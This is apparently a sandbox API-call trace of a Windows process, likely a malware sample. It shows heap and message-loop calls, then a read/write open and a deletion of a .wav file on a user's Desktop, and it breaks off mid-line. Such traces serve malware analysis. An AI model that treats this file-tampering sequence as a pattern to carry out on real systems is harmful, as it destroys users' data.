[0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.505] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.506] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.506] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0029.506] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.506] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ijelx2uuwgwpqu0c7o2.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0029.506] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0029.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0029.506] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.507] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.507] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.507] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.507] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.508] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.508] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.508] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.508] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0029.508] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0029.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0029.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0029.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0029.509] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.509] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.509] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.509] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.509] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0029.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0029.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.509] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.509] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.509] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0029.509] FreeLibrary (hLibModule=0x76e10000) returned 1 [0029.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0029.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.510] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.510] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.510] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav", lpFilePart=0x0) returned 0x3e [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0029.510] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ijelx2uuwgwpqu0c7o2.wav")) returned 0x20 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0029.510] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0029.510] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0029.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.511] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0029.511] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0029.511] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8b660, ftCreationTime.dwHighDateTime=0x1d5b7e5, ftLastAccessTime.dwLowDateTime=0x65c8b140, ftLastAccessTime.dwHighDateTime=0x1d5c48a, ftLastWriteTime.dwLowDateTime=0x1179e820, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8fe2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="1ijelx2uuwgwpQu0c7o2.wav", cAlternateFileName="1IJELX~1.WAV")) returned 0x7c2100 [0029.511] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1ijelx2uuwgwpQu0c7o2.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1ijelx2uuwgwpqu0c7o2.wav")) returned 1 [0029.512] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8b660, ftCreationTime.dwHighDateTime=0x1d5b7e5, ftLastAccessTime.dwLowDateTime=0x65c8b140, ftLastAccessTime.dwHighDateTime=0x1d5c48a, ftLastWriteTime.dwLowDateTime=0x1179e820, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x8fe2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="1ijelx2uuwgwpQu0c7o2.wav", cAlternateFileName="1IJELX~1.WAV")) returned 0 [0029.512] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0029.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0029.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0029.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0029.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0029.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0029.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.512] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.512] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0029.513] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) 